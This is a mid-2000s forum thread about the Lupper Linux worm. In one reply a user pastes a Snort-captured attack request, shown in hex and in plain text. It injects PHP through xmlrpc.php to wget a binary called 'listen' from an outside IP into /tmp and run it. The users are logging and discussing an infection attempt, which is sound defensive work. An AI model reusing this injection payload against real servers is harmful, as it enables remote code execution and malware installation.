Author Topic: Lupper the Linux Worm! (Read 3224 times)

zorm · « **on:** November 07, 2005, 08:36:04 pm »

http://vil.nai.com/vil/content/v_136821.htm

Kind of neat. Too bad its exploiting PHP/CGI.

Ergot · « **Reply #1 on:** November 07, 2005, 10:54:59 pm »

I saw that, found that while looking for exploits... I'm pretty sure it doesn't affect me

RoMi · « **Reply #2 on:** November 28, 2005, 08:32:04 pm »

Snort picked it up for me. Atleast I'm pretty sure it did.

 length = 410

000 : 50 4F 53 54 20 2F 78 6D 6C 72 70 63 2E 70 68 70   POST /xmlrpc.php
010 : 20 48 54 54 50 2F 31 2E 31 0A 48 6F 73 74 3A 20    HTTP/1.1.Host: 
020 : 32 34 2E 33 34 2E 32 38 2E 36 32 0A 55 73 65 72   24.*.*.*.User
030 : 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F   -Agent: Mozilla/
040 : 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B   4.0 (compatible;
050 : 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64 6F    MSIE 6.0; Windo
060 : 77 73 20 4E 54 20 35 2E 31 3B 29 0A 43 6F 6E 74   ws NT 5.1;).Cont
070 : 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 78   ent-Type: text/x
080 : 6D 6C 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74   ml.Content-Lengt
090 : 68 3A 32 36 39 0A 0A 3C 3F 78 6D 6C 20 76 65 72   h:269..<?xml ver
0a0 : 73 69 6F 6E 3D 22 31 2E 30 22 3F 3E 3C 6D 65 74   sion="1.0"?><met
0b0 : 68 6F 64 43 61 6C 6C 3E 3C 6D 65 74 68 6F 64 4E   hodCall><methodN
0c0 : 61 6D 65 3E 74 65 73 74 2E 6D 65 74 68 6F 64 3C   ame>test.method<
0d0 : 2F 6D 65 74 68 6F 64 4E 61 6D 65 3E 3C 70 61 72   /methodName><par
0e0 : 61 6D 73 3E 3C 70 61 72 61 6D 3E 3C 76 61 6C 75   ams><param><valu
0f0 : 65 3E 3C 6E 61 6D 65 3E 27 2C 27 27 29 29 3B 65   e><name>',''));e
100 : 63 68 6F 20 27 5F 62 65 67 69 6E 5F 27 3B 65 63   cho '_begin_';ec
110 : 68 6F 20 60 63 64 20 2F 74 6D 70 3B 77 67 65 74   ho `cd /tmp;wget
120 : 20 32 34 2E 32 32 34 2E 31 37 34 2E 31 38 2F 6C    24.224.*.*/l
130 : 69 73 74 65 6E 3B 63 68 6D 6F 64 20 2B 78 20 6C   isten;chmod +x l
140 : 69 73 74 65 6E 3B 2E 2F 6C 69 73 74 65 6E 20 20   isten;./listen  
150 : 20 20 20 20 20 20 20 60 3B 65 63 68 6F 20 27 5F          `;echo '_
160 : 65 6E 64 5F 27 3B 65 78 69 74 3B 2F 2A 3C 2F 6E   end_';exit;/*</n
170 : 61 6D 65 3E 3C 2F 76 61 6C 75 65 3E 3C 2F 70 61   ame></value></pa
180 : 72 61 6D 3E 3C 2F 70 61 72 61 6D 73 3E 3C 2F 6D   ram></params></m
190 : 65 74 68 6F 64 43 61 6C 6C 3E                     ethodCall>

Plain display:

Code: [Select]

POST /xmlrpc.php HTTP/1.1
Host: 24.*.*.*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length:269

<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_';echo `cd /tmp;wget 24.224.*.*/listen;chmod +x listen;./listen         `;echo '_end_';exit;/*</name></value></param></params></methodCall>

Look's so far so good though as far as not getting infected. Looked in /tmp and can't see listen. So far it's hit about 200 times.

mc0 · « **Reply #3 on:** February 28, 2006, 12:00:44 am »

Quote from: zorm on November 07, 2005, 08:36:04 pm

http://vil.nai.com/vil/content/v_136821.htm

Kind of neat. Too bad its exploiting PHP/CGI.

why too bad?

iago · « **Reply #4 on:** February 28, 2006, 08:48:06 am »

Quote from: mc0 on February 28, 2006, 12:00:44 am

Quote from: zorm on November 07, 2005, 08:36:04 pm
http://vil.nai.com/vil/content/v_136821.htm

Kind of neat. Too bad its exploiting PHP/CGI.

why too bad?

Because it isn't really exploiting Linux, technically, it's exploiting PHP.

mc0 · « **Reply #5 on:** February 28, 2006, 10:54:53 pm »

Yes .. I'd say that's good. There aren't many remote exploits that can target nix itself.

Clan x86

News:

Author Topic: Lupper the Linux Worm! (Read 3224 times)

zorm

Lupper the Linux Worm!

Ergot

Re: Lupper the Linux Worm!

RoMi

Re: Lupper the Linux Worm!

mc0

Re: Lupper the Linux Worm!

iago

Re: Lupper the Linux Worm!

mc0

Re: Lupper the Linux Worm!